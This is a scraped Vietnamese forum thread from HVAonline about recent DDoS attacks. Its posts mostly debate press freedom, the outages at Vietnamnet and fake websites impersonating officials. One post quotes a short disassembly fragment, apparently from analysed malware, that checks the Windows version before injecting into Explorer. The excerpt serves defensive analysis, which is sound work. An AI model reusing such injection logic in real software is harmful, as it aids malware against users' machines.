Chúc mừng anh PXMMRF thì tốt nhưng việc chúc mừng này bị giảm mất ít nhiều giá trị vì lời chúc mừng không phải dành cho anh PXMMRF một cách trọn vẹn mà dùng nó để giải toả tự ái vì bị "chỉ trích". Nếu bồ phê bình những người chỉ biết chỉ trích mà không (hoặc chưa) làm gì thật sự có ích cho xã hội thì những kẻ chẳng những không làm gì có ích cho xã hội mà còn tàn phá xã hội, rút rỉa xã hội nhưng vẫn mang cái mớ lý thuyết ý thức hệ để chửi rủa và truyền đạt hành động chửi rủa từ thế hệ này sang thế hệ khác thì bồ nghĩ sao?]]>
/hvaonline/posts/list/39641.html#247044 /hvaonline/posts/list/39641.html#247044 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
những kẻ chẳng những không làm gì có ích cho xã hội mà còn tàn phá xã hội, rút rỉa xã hội nhưng vẫn mang cái mớ lý thuyết ý thức hệ để chửi rủa và truyền đạt hành động chửi rủa từ thế hệ này sang thế hệ khác  
Chuẩn không cần chỉnh. VN ta thì chỉ theo tiêu chí CCCO mà thôi, cho nên cũng không trách được(?). Ngay ở thị trấn tôi ở các con của chủ tịch, bí thư nói thật là đầu óc như quả nho, học hành không đâu vào đâu nhưng vẫn có chân trong bộ máy HC, thử hỏi những người này nắm trong bộ máy lãnh đạo thì thị trấn của tôi đi về đâu? Suy rộng ra( như lời Hồ Chủ Tịch đã nói) nước Việt ta sẽ đi về đâu? Đến lúc nào chúng ta mạnh dạn nhận sai lầm và chịu cải tổ( bắt đầu bằng tư duy), cải tổ hệ tư tưởng, cải tổ cái ý thức hệ thì mới mong Việt Nam phát triển sánh ngang với cường quốc năm châu như lời Bác Hồ đã dạy.]]>
/hvaonline/posts/list/39641.html#247123 /hvaonline/posts/list/39641.html#247123 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247126 /hvaonline/posts/list/39641.html#247126 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:
hình như vietnamnet bị DDoS tiếp rồi, mấy hôm trước mình vẫn vô bình thường còn hôm nay vô thì trắng bóc. 
Hiện tại tôi vẫn đọc Vietnamnet bình thường. 16h02 PM GMT+7 14/09/2011]]>
/hvaonline/posts/list/39641.html#247128 /hvaonline/posts/list/39641.html#247128 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247132 /hvaonline/posts/list/39641.html#247132 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247139 /hvaonline/posts/list/39641.html#247139 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Theo mình biết : Trong thời gian qua VNN quả thật có một số bài viết khá gay gắt về vấn đề biển đông, TQ. Tuy nhiên nhưng bài viết kiểu như vậy xuất hiện khá nhiều tại các tờ báo mạng khác như Dantri, Vnexpres,... Vì vậy theo mình suy nghĩ tại vì VNN có những bài như vậy nên mới bị DDos là không hoàn toàn chính xác và hơn nữa gần đây số bài như vậy trên VNN khá ít nhưng VNN vấn bị DDos. Còn lý do vì sao thì có lẽ chính VNN mới là người hiểu nhất :D Mình cũng mới chỉ biết một vài thông tin sơ sơ ( Do mấy thằng bạn làm trong VNN nói trong lúc "phê phê "chưa xác thực nên chưa dám công bố :D ). Và việc các cq có thẩm quyền có tới làm việc với VNN để giải quyết vấn đề trên không thì chúng ta( những người không làm ở VNN) không hề biết chính xác.]]> /hvaonline/posts/list/39641.html#247142 /hvaonline/posts/list/39641.html#247142 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

nowhereman wrote:
@TMDTH : tại hạ không biết nên đã thất lễ với tiền bối. mong rằng tiền bối lượng thứ nếu tại hạ có viết ý gì gây khó chịu. tại hạ xin trân trọng những ý kiến góp ý của tiền bối ạ. tại hạ xin cố gắng sửa, và điều chỉnh chính tả để tiếng việt mình thêm đẹp hơn và đúng nữa . > tiền bối đang nghiên cứu để lập trình một " tool hỗ trợ phân tích sóng gây nhiễu radar ? vậy tiền bối có thể cho tại hạ biết " quá trình đi ngược " của tiền bối về các loại sóng gây nhiễu ? các loại sóng ảnh hướng tối sóng rada ? và nguồn nó ở đâu chưa? . rùi biết đâu anh em HVA lại giúp anh lập trình ok mà . chúc anh thành công .  
Chân thành cảm ơn HVA member, khi nào khó khăn mình sẽ nhờ lòng yêu dân tộc của bạn. Hiện giờ cho mình sorry nhé, "bí mật không thể bật mí" :D !!! PS: cảm ơn HVA member đã khơi dậy lòng tự hào của dân tộc Việt Nam. Việc các anh làm rất có ý nghĩa trong hoàn cảnh này. Trân trọng và Chúc sức khoẻ HVA member. " đâm mấy thằng gian bút chẳng tà".]]>
/hvaonline/posts/list/39641.html#247143 /hvaonline/posts/list/39641.html#247143 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

cino wrote:
Chào các bác, thấy các bác ngoài lề em cũng mổ cò ngoài lề vài phát. Nếu cứ bị DDOS triền miên thì VNN mất khoảng bao lâu là tuyên bố "phá sản" được nhỉ? Không biết các BTV, KTV, CTV khi không tác nghiệp thì họ làm gì. O-) Chút tưởng tượng dọc theo 1 câu truyện trên topic này, Tại sao VNN *hay đá nhầm sân* (hay là *đi nhầm lề*) mà không bị tuýt còi trực tiếp (mà lại bị *dằn mặt* như hiện nay), giống như vụ tuýt còi bắt gỡ bài viết gì đó về sân bay ở ngoài hải đảo và bị phạt mấy chục triệu năm nao vậy. Có gì nhầm lẫn ở đây không? 
Đối với một xã hội trong đó có đa số những người có khả năng tư duy, phân tích, đánh giá và nhận định vấn đề một cách chính xác và trung thực (chớ chẳng phải được "định hướng" như một lũ học sinh nhỏ) thì việc "đá nhầm sân" hay "đi nhầm lề" không tồn tại bởi vì chẳng có cái gì gọi là "sân" và "lề" đối với những con người biết đánh giá vấn đề trong đúng khuôn khổ (context) và hoàn cảnh bằng chính tư duy của mình. Một xã hội khoẻ mạnh là một xã hội luôn luôn có những ý kiến trái chiều và những quan điểm đối nghịch nhau để làm đối trọng và gìn giữ sự cân bằng. Cho dù một tờ báo hay một cá nhân nào đó nói gì "trật lề" bởi vì tờ báo ấy và cá nhân ấy sống trong một xã hội mà mỗi sự việc đều cần được "theo lề" đi chăng nữa, chuyện đúng hay sai, giá trị hay vô giá trị ...v...v.... là để cho xã hội tự đánh giá và tự loại bỏ chớ chẳng phải để cho một nhúm người nào đó tự "đại diện", tự đánh giá thay cho cả xã hội và dùng một dạng sức mạnh nào đó để loại bỏ những gì nằm bên ngoài những thứ họ áp đặt. Đã hết thập niên thứ nhất của thế kỷ 21, thế kỷ của "thông tin", của trí tuệ, của "thế giới phẳng", của sự mở rộng gần như không giới hạn của tri thức và trí thức...v...v... vậy mà vẫn có những con người hành xử và vẫn có những con người chấp nhận được hành xử như thời phong kiến đầy hủ lậu. Thời xưa, có vô số những điều gọi là "phạm huý" (đung chạm nhà vua) nên cấm kỵ và hễ ai nói ra thì mang vạ vào thân. Ngày nay không có vua và "mọi người đều bình đẳng" nhưng vẫn có muôn vàn cái "huý" và hễ ai nói ra cũng mang vạ vào thân chẳng khác gì ngày xưa. Ngày xưa, "thánh chỉ" ban xuống thì chỉ có cúi đầu phủ phục mà tuân theo chớ chẳng bao giờ dám hé môi cho dù "thánh chỉ" có phi lý, vô đạo đến mức nào đi chăng nữa. Ngày nay, không có "thánh chỉ" nữa nhưng những con người của ngày nay vẫn "phủ phục" ở một tư thế khác. Đánh đổ làm chi cái chữ "phong kiến" trong khi tư duy của những con dân "phong kiến" vẫn đầy ăm ắp không khác gì ngày xưa? Vietnamnet "đi nhầm lề" là do chính bản thân mình nhận thấy như thế và cái "lề" nào đó là do chính mình đặt ra theo tiêu chuẩn và nhận định của cá nhân mình hay là do những ai đó "định hướng" giúp mình và "cái lề" nào đó là do họ (những ai đó) đặt ra? ]]>
/hvaonline/posts/list/39641.html#247145 /hvaonline/posts/list/39641.html#247145 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. ĐẦY DẪY WEBSITE MẠO DANH CÁ NHÂN VÀ TỔ CHỨC TRÊN MẠNG Gần đây trên mạng xuất hiện và đầy dẫy các website mạo danh cá nhân. Hầu hết các nhà lãnh đạo Việt nam và các yếu nhân đều có website mao danh. Thống kê chưa đầy đủ có tới trên dưới 200 tên miền trỏ đến các website mạo danh cá nhân. Website mao danh cá nhân được hosting tai nhiều webserver và các webserver này hầu hết hay tất cả là các dedicated server (server thuê riêng) có IP tĩnh riêng, được thiết lập chỉ để hosting website mao danh. (Mỗi cá nhân có 1 website mạo danh và mỗi website mạo danh có một webserver riêng). Chi phí cho "dịch vụ này" quả là rất lớn và tốn rất nhiều nhân lực! Các bạn tham khảo báo Tuổi trẻ điện tử, tai đây: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Hôm nay trang web báo Cantho online Cơ quan của Đảng bộ TP Cần thơ, link tai: http://baocantho.com.vn cũng bị giả mạo. Website giả mạo tại có domain là http://baocantho.net/ Bài phân tích sự kiện giả mạo website Cần thơ tại đây: http://vov.vn/Home/Phat-hien-vu-lam-gia-bao-dien-tu-Can-Tho/20119/185965.vov Cách đây vài hôm tôi cũng đã thông báo cho các bạn hiện tượng này và kẻm ý kiến cá nhân (chỉ là ý kiến cá nhân). Nhưng hình như không có ai quan tâm nghiên cứu và bình luận:
Nhân đây tôi "bật mí" cho các bạn một thông tin. Trong bài viết đánh giá về tổ chức của STL (bao gồm chính bản thân STL và bộ phận lãnh đạo, hướng dẫn nó) trong topic này tôi có viết một câu:

PXMMRF ngay17/08/2011 luc 15:44:12 wrote:
Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ.  
Bai viết tại: /hvaonline/posts/list/450/39641.html#245191 Thì nay xin tiết lộ, câu viết trên đây ám chỉ sự kiện sau: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Vào thời gian viết bài nói trên, tôi đã biết sư kiện này và đang tìm hiểu nó. Vì chưa tìm hiểu kỹ nên chưa thể thông báo. Nay báo NLĐ và Tuổi trẻ online đã thông báo sự kiện, nên không còn gì là bí mật nữa. Tuy nhiên thực tế nghiêm trong và kinh hãi hơn thông tin trên báo nhiều. 
---------------------------------------------------- Theo các bạn hiện tương trên có được coi là nghiêm trọng hay không? Tại sao lại coi như vậy? Và theo các bạn, ai đứng sau hành vi này? Xin ý kiến bình luận của các bạn ]]>
/hvaonline/posts/list/39641.html#247192 /hvaonline/posts/list/39641.html#247192 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Câu thứ nhất: Theo các bạn hiện tương trên có được coi là nghiêm trọng hay không? Tại sao lại coi như vậy? - Hiện tượng trên e cho là quá nghiêm trọng! Bởi lẽ điều gì liên quan đến chính trị đều như vậy, nó ảnh hưởng tới 1 tập thể, tổ chức và lớn hơn nữa là tầm quốc gia. Người dân không hay biết rằng đó là website mạo danh, từ đó tin vào những bài viết ( không biết tác giả là ai ) và dẫn đến có ( hay không ) những ý kiến trái chiều sau khi tiếp thu. Xuyên tạc kiểu này thoạt nhìn rất đơn giản nhưng tầm hoạt động không hề nhỏ chút nào. Hầu hết ai ai cũng tiếp xúc vs máy tính và việc truy cập vào mạng để xem thông tin là rất dễ dàng. Từ những thông tin đó, "họ" vịn vào để làm bàn đạp cho những âm mưu, diễn biến hoà bình... Và làm như "vô tình" có cớ để thực hiện. Còn người dân thì hoang mang không biết tin vào ai :) Câu thứ hai: Và theo các bạn, ai đứng sau hành vi này? - Hj, dám cá ai đọc xong câu này thì ngay lập tức trong đầu sẽ nghĩ ngay đến "bọn đó" dù ít hay nhiều ^^ Thật ra dù là ai thì vs âm mưu thâm hiểm như vậy, chắc chắn có thể gọi "họ" là những người không hài lòng vs hệ thống NN hiện tại, hoặc kẻ thù địch bên ngoài nước muốn gây rối, triệt hạ dần quốc gia VN. Và tất nhiên, những kẻ trực tiếp làm ra chuyện này đều là những người có đầu óc và khả năng phân tích tốt. Bởi lẽ hệ thống nhận thức càng cao thì đi kèm cùng đó là phát hiện ra những kẽ hở để mà khắc phục ( triệt hạ ). Nhưng sự khắc phục ( triệt hạ ) đó dựa trên quan điểm như thế nào, mang lại lợi ích cho ai thì còn bỏ ngõ.. ]]> /hvaonline/posts/list/39641.html#247198 /hvaonline/posts/list/39641.html#247198 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247206 /hvaonline/posts/list/39641.html#247206 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok wrote:
Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền - Các trang web giả khác thì nguy hại khi người đọc đã bị "định hướng" từ nhỏ ( như anh Conmale đã viết), không có khả năng tư duy để phân biệt mà chỉ biết tiếp nhận thông tin một chiều. Cái nguy hại nhất ở đây là xã hội VN hiện nay, người dân luôn tiếp nhận thông tin được áp đặt vì vậy mới tạo điều kiện cho cái xấu hoành hành. Bạn Rolex viết âm mưu, diễn biến hoà bình mà mình hãi quá. Chẳng hiểu diễn biến hoà bình là gì?!!! 
Bạn viết như thế này không có chút thuyết phục nào cả. ]]>
/hvaonline/posts/list/39641.html#247215 /hvaonline/posts/list/39641.html#247215 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mrviet wrote:

Sherlockok wrote:
Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền - Các trang web giả khác thì nguy hại khi người đọc đã bị "định hướng" từ nhỏ ( như anh Conmale đã viết), không có khả năng tư duy để phân biệt mà chỉ biết tiếp nhận thông tin một chiều. Cái nguy hại nhất ở đây là xã hội VN hiện nay, người dân luôn tiếp nhận thông tin được áp đặt vì vậy mới tạo điều kiện cho cái xấu hoành hành. Bạn Rolex viết âm mưu, diễn biến hoà bình mà mình hãi quá. Chẳng hiểu diễn biến hoà bình là gì?!!! 
Bạn viết như thế này không có chút thuyết phục nào cả.  
Bạn vui lòng cho biết, không thuyết phục ở chỗ nào ? Chứ nói khơi khơi thì .... =)) =)) :-( ]]>
/hvaonline/posts/list/39641.html#247218 /hvaonline/posts/list/39641.html#247218 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok wrote:
Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền  
"những người đã lên web đọc thì cũng hiểu các nhà lãnh đạo chả ông nào làm trang web riêng cả" ? Nếu những thông tin đó a PXMMRF không đưa lên thì mình tin chắc sẽ có rất nhiều người ( như mình chẳng hạn) lên đọc và tin những điều trên web đó nói. Vì ban đầu thông tin trên đó đều là những thông tin chính xác, nhưng sau đó...Và việc một nhà lãnh đạo có trang web riêng thì cũng khá bình thường thôi bạn. Và nếu ai cũng có khả năng phân tích vấn đề, cẩn thận như vậy thì chắc nạn vr, worm,... đã không hoành hành ghê gớm đến vậy "Vì khả năng của ông lãnh đạo, vì tâm không có" : Câu này mình thực sự không hiểu. Chẳng lẽ trong rất nhiều lãnh đạo lại không có ai có khả năng làm nổi một trang web( bạn hơi bị coi thường người khác rồi), họ không làm vì không có thời gian thôi và hơn nữa những việc đó đã có bộ phận khác làm và thường xuyên up lên đó những thông tin liên quan đến vị lãnh đạo đó lên cho họ.]]>
/hvaonline/posts/list/39641.html#247222 /hvaonline/posts/list/39641.html#247222 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. ĐẦY DẪY WEBSITE MẠO DANH CÁ NHÂN VÀ TỔ CHỨC TRÊN MẠNG Còn hôm qua 15/9/2011 là sự kiện "mạo danh" khác: Cướp thương hiệu Việt ở nước ngoài và toan tính sâu xa Hôm qua vietnamnet.vn (tai Diễn đàn kinh tế Việt nam, http://vef.vn) có đăng tải bài viết trên. Tuy nhiên việc truy câp đến vietnamnet.vn thường khá khó khăn, ngay cả khi truy cập trực tiếp vào đia chỉ http://vef.vn. Nhiều website khác đã sao chép nguyên văn lai bài viết. Vì vậy để xem nôi dung bài viết, các ban nên truy câp vào các website này.
Cướp thương hiệu Việt ở nước ngoài và toan tính sâu xa Thứ Năm, 15/09/2011 | 06:15 http://vietstock.vn/ChannelID/768/Tin-tuc/201003-cuop-thuong-hieu-viet-o-nuoc-ngoai-va-toan-tinh-sau-xa.aspx Những vụ "cướp" thương hiệu Việt trên thị trường thế giới có thể do đối tác không tin tưởng vào thiện chí làm ăn hay đón đầu để ép DN Việt mua lại thương hiệu. Không loại trừ khả năng lôi kéo vào các vụ kiện tụng kéo dài, tốn kém, làm suy yếu khả năng cạnh tranh của và chặn đường phát triển của các sản phẩm VN. Cách đây vài ngày, một hãng luật quốc tế có trụ sở ở Việt Nam vừa phát hiện ra hai nhãn hiệu "Cà phê Buôn Ma Thuột" và "Buôn Ma Thuột cà phê 1896" đều được công ty TNHH cà phê Quảng Châu - Buôn Ma Thuột bảo hộ trong thời hạn 10 năm. Nghĩa là, trong 10 năm tới, các DN cà phê mang chỉ dẫn địa lý Buôn Ma Thuột của Việt Nam có thể sẽ bị ngăn chặn nếu xuất khẩu vào Trung Quốc. Mất thương hiệu đồng nghĩa với việc mất thị trường. ............................... .............................. Nếu tài sản hữu hình được xem là phần "xác" thì nhãn hiệu được ví như "linh hồn" của doanh nghiệp. Một doanh nghiệp mà phần hồn bị đánh mất thì khác nào một thực thể vô tri, không có sức cạnh tranh, sức hấp dẫn, có nguy cơ bị thâu tóm và lệ thuộc. Khi mất quyền sở hữu nhãn hiệu, doanh nghiệp không chỉ mất thị trường, hàng thật biến thành hàng giả vì nhãn hiệu của mình đã được bảo hộ bởi một đơn vị khác, ... mà còn ảnh hưởng lâu dài tới uy tín, sức cạnh tranh và nhiều hệ lụy khác lâu dài. Nếu muốn phát triển cơ hội kinh doanh ở các thị trường này thì doanh nghiệp Việt Nam thường phải đối diện với những vụ kiện tụng tốn kém kéo dài hoặc phải tốn tiền mua lại quyền sở hữu nhãn hiệu vốn là của mình. ....................................... Trần Minh Quân Diễn đàn kinh tế Việt Nam (Vietnamnet) 
----------------------------------------- Comment: - Tôi không đồng ý lắm với cách dùng từ "Cướp" của bài viết trên Vietnamnet Vì thưc ra khi đăng ký các nhãn hiệu cà phê BMT, doanh nghiệp TQ đã làm theo đúng luật của TQ và luật quốc tế trong việc Đăng ký bảo hộ nhãn hiệu hàng hoá. Chỉ có điều đây rõ ràng là một hành đông không đẹp chút nào hay được coi là xấu chơi, đăc biệt trong bối cảnh quan hệ VN-TQ luôn được tuyên bố là "vừa là đồng chí-vừa là anh em", hay "4 tốt", "16 chữ vàng"... - Quay trở lai sự kiện "Website mạo danh cá nhân, tổ chức" nói trên, xin các bạn trao đổi thêm cho sáng ý là: Hành đông mao danh website cá nhân, tổ chức như vậy có phù hơp với luật pháp VN, luật pháp Mỹ (vì hâu hết webserver hosting các website mạo danh đặt tai Mỹ) và luật quốc tế hay không? Và tai sao lại như vây?. - ]]>
/hvaonline/posts/list/39641.html#247225 /hvaonline/posts/list/39641.html#247225 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:

Sherlockok wrote:
Ý kiến của mình về bài trên của bác PX : - Giả các trang web của lãnh đạo gây hại rất ít, vì những người đã lên web đọc thì cũng hiểu là các lãnh đạo chả ông nào làm trang web riêng cả. Vì khả năng của ông lãnh đạo, vì tâm không có. Vì thế, đọc là biết giả liền  
"những người đã lên web đọc thì cũng hiểu các nhà lãnh đạo chả ông nào làm trang web riêng cả" ? Nếu những thông tin đó a PXMMRF không đưa lên thì mình tin chắc sẽ có rất nhiều người ( như mình chẳng hạn) lên đọc và tin những điều trên web đó nói. Vì ban đầu thông tin trên đó đều là những thông tin chính xác, nhưng sau đó...Và việc một nhà lãnh đạo có trang web riêng thì cũng khá bình thường thôi bạn. Và nếu ai cũng có khả năng phân tích vấn đề, cẩn thận như vậy thì chắc nạn vr, worm,... đã không hoành hành ghê gớm đến vậy "Vì khả năng của ông lãnh đạo, vì tâm không có" : Câu này mình thực sự không hiểu. Chẳng lẽ trong rất nhiều lãnh đạo lại không có ai có khả năng làm nổi một trang web( bạn hơi bị coi thường người khác rồi), họ không làm vì không có thời gian thôi và hơn nữa những việc đó đã có bộ phận khác làm và thường xuyên up lên đó những thông tin liên quan đến vị lãnh đạo đó lên cho họ. 
Ý mình ở đây không phải là khả năng về tin học của người đọc thông tin trên internet, mà là ý thức khi tiếp nhận thông tin. Rộng hơn là do cách giáo dục mang tính áp đặt, thông tin trong xã hội cũng là một chiều. Chính vì vậy đa số mọi người ít khi tư duy, phân tích thông tin mình nhận được. Tất nhiên các ông lãnh đạo không ai làm trang web về mặt kĩ thuật, mà là chịu trách nhiệm về thông tin trên trang web riêng của các ông ấy. Mình không coi thường ai cả, mình chỉ nói thực tế ở VN hiện nay thôi, mình chưa thấy ông lãnh đạo nào ở VN có trang web hay blog riêng cả. Các vị thủ tướng nổi tiếng thế giới vẫn có blog, web... nên không thể nói bận về thời gian. Mình chỉ không tin ở VN, có ông nào đủ khả năng dám trao đổi thông tin trên trang web riêng với người dân thôi. ]]>
/hvaonline/posts/list/39641.html#247229 /hvaonline/posts/list/39641.html#247229 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247259 /hvaonline/posts/list/39641.html#247259 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

cino wrote:
Chào các bác, thấy các bác ngoài lề em cũng mổ cò ngoài lề vài phát. Nếu cứ bị DDOS triền miên thì VNN mất khoảng bao lâu là tuyên bố "phá sản" được nhỉ? Không biết các BTV, KTV, CTV khi không tác nghiệp thì họ làm gì. O-) Chút tưởng tượng dọc theo 1 câu truyện trên topic này, Tại sao VNN *hay đá nhầm sân* (hay là *đi nhầm lề*) mà không bị tuýt còi trực tiếp (mà lại bị *dằn mặt* như hiện nay), giống như vụ tuýt còi bắt gỡ bài viết gì đó về sân bay ở ngoài hải đảo và bị phạt mấy chục triệu năm nao vậy. Có gì nhầm lẫn ở đây không? 
Đối với một xã hội trong đó có đa số những người có khả năng tư duy, phân tích, đánh giá và nhận định vấn đề một cách chính xác và trung thực (chớ chẳng phải được "định hướng" như một lũ học sinh nhỏ) thì việc "đá nhầm sân" hay "đi nhầm lề" không tồn tại bởi vì chẳng có cái gì gọi là "sân" và "lề" đối với những con người biết đánh giá vấn đề trong đúng khuôn khổ (context) và hoàn cảnh bằng chính tư duy của mình. 
Chào bác, theo em cái xã hội tự do và tự chủ không giới hạn lề lối đó nó nằm trong "giấc mơ" của Lê Nin mà thôi. Mọi xã hội luôn có những "lề lối" của nó. (nghĩa hiểu theo khía cạnh chính trị). Chẳng hạn bao nhiêu nước tự do, dân chủ; mà sau khi WikiLeaks của Julian Assange quyết định phá vỡ cái "lề" ấy đi thì bấy nhiêu con người (là chủ của một xã hội) phải gầm rú và nhất quyết "xử" bằng mọi giá (xúi amazon, paypal... kicks off). Mọi xã hội, hay một thế giới chẳng có cái gì mở toang theo hướng một chiều hết, mọi thứ đều có ít nhiều những đối trọng tạo nên một cái "lề", cái "lề" chính trị. Bao giờ không còn từ ngữ "đàn áp chính trị" thì mới chẳng có cái *chẳng có cái gì gọi là "sân" và "lề"* như bác nói. Và cái gọi là "lề" hay không có "lề" cũng tuỳ vào không gian/ hoàn cảnh của người nói. Đối với người làm chủ thì cái "lề" ấy chính là toàn bộ quốc gia, còn đối với người "chống đối" cái lề mà chính họ đang theo là "lề phải" trong khi những người đi theo người chủ thì lại coi đó là "lề trái". * Về các website mạo danh, em nghĩ đó là chiêu thức tung tin "phản động" ("phản động" hiểu theo nghĩa những mà người đang theo chính quyền CS đang nghĩ) và dựa vào nó để tạo niềm tin cho đa số nhân dân (nông dân). Vì họ vốn có niềm tin vào Đảng, vốn dễ choáng ngợp khi thấy cái website hoành tráng, ấn tượng lại treo cờ chính phủ Việt Nam, lẽ dĩ nhiên thông tin trong đó không do chính phủ VN viết.]]>
/hvaonline/posts/list/39641.html#247261 /hvaonline/posts/list/39641.html#247261 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. nhưng chưa đủ tầm ...?" Các Anh Chị chiêm nghiệm kỹ: "lòng thì có nhưng dốt không làm đc nên ... hehehehehe chơi chữ, thử hỏi 85 tr dân VN có bao nhiêu % nghĩ thế ...???" ]]> /hvaonline/posts/list/39641.html#247268 /hvaonline/posts/list/39641.html#247268 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. CHẤM DỨT NGAY HÀNH VI CHÍNH TRỊ HOÁ CÔNG NGHỆ THÔNG TIN ĐI điều đó thật dơ bẩn và bỉ ổi, nhất là đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người @TQN: I am waiting you]]> /hvaonline/posts/list/39641.html#247270 /hvaonline/posts/list/39641.html#247270 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Nội quy diễn đàn HVAOnline HVAOnline là diễn đàn phi lợi nhuận, phi tôn giáo, phi chính trị. Diễn đàn được lập ra với mục đích chia sẻ, trao đổi kiến thức và kinh nghiệm. Để HVAOnline là một nơi sinh hoạt lành mạnh và bổ ích, thành viên cần lưu ý những điểm như sau:................................   mỗi khi vào đăng nhập vào diễn đàn em đều thấy cái này, có vẻ như dạo này bác TQN hơi bận RCE , ít viết thêm các phân tích chuyên môn nên topic bắt đầu có vẻ lạc đề hay sao ý nhỉ ? ]]> /hvaonline/posts/list/39641.html#247271 /hvaonline/posts/list/39641.html#247271 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
text:10001431     @@CheckWinVer:                          ; CODE XREF: PrepareDebugSymbolW+304j
.text:10001431 1E8C        cmp     [ebp+dwVerMajor], 5
.text:10001438 1E8C        ja      short @@NewerThanWinXP
.text:10001438
.text:1000143A 1E8C        cmp     [ebp+dwVerMinor], 1
.text:10001441 1E8C        ja      short @@NewerThanWinXP
.text:10001441
.text:10001443 1E8C        mov     [ebp+bInjectToExplorer], 0
.text:1000144A 1E8C        jmp     short @@j_CanInjectToExplorer
.text:1000144A
Nếu là WinXP trở xuống thì nó sẽ thoát, không làm thêm gì cả ! Vì vậy, em rút kinh nghiệm từ giờ luôn, không bao giờ tiết lộ cho ai biết về máy tính, Win ver, AV, Firewall mà mình đang dùng, cả trên các forum hay bờ lốc, bờ liếc....]]>
/hvaonline/posts/list/39641.html#247273 /hvaonline/posts/list/39641.html#247273 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc wrote:
đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người 
Chào bác, em có nói tới vấn đề ngoài lề do tính chất của riêng cái topic này, theo lề lối của các bác admin và cũng để các bác đang RCE có hào hứng hơn vì công việc của họ có nhiều người quan tâm. :D Em là dân thường, nhưng cũng sợ bị "bạch hoá" lắm lắm. :D Đúng ra là em không post thêm nữa. Nhưng em cho rằng, quan điểm của chính cá nhân bác lại không đúng đắn cho lắm, đây cũng là quan điểm chung khi có nhiều bạn trẻ cứ hùi hụi vào "công nghệ, công nghệ thông tin" mà có những suy nghĩ "rạch ròi" tương tự như bác. (xin bác đừng vì câu nói này của em mà cãi cọ sang một vấn đề khác). Có nhiều người tâm hồn rất nhân văn nhưng vẫn là cha đẻ của những vũ khí kinh hoàng. Hải đăng Einstein là một ví dụ, vẫn có người trách Einstein là nguồn cơn của vấn đề bom nguyên tử, không chỉ vì cái thư ủng hộ dự án đó của cụ ấy, mà còn vì cái lý thuyết mở đường E=mc2 cho bom hạt nhân...]]>
/hvaonline/posts/list/39641.html#247275 /hvaonline/posts/list/39641.html#247275 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247278 /hvaonline/posts/list/39641.html#247278 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC wrote:
@all: vietnamnet.vn đã bị hack hay chỉ là 1 giao thức an toàn ... Post: 9:30 AM 17/Sep/2011.  
@TMDTHBC : anh hỏi " vietnamnet.vn đã bị hack hay chỉ là một giao thức an toàn ... " = em thật sự không hiểu anh hỏi gì ạ? xin anh lý giải câu hỏi cho em được học hỏi được không ạ? hay là kiểu " xìtrum ? " :-O >> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<< lỗi bì bị ddos . The server at www.vietnamnet.vn is taking too long to respond. ]]>
/hvaonline/posts/list/39641.html#247279 /hvaonline/posts/list/39641.html#247279 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:

TMDTHBC wrote:
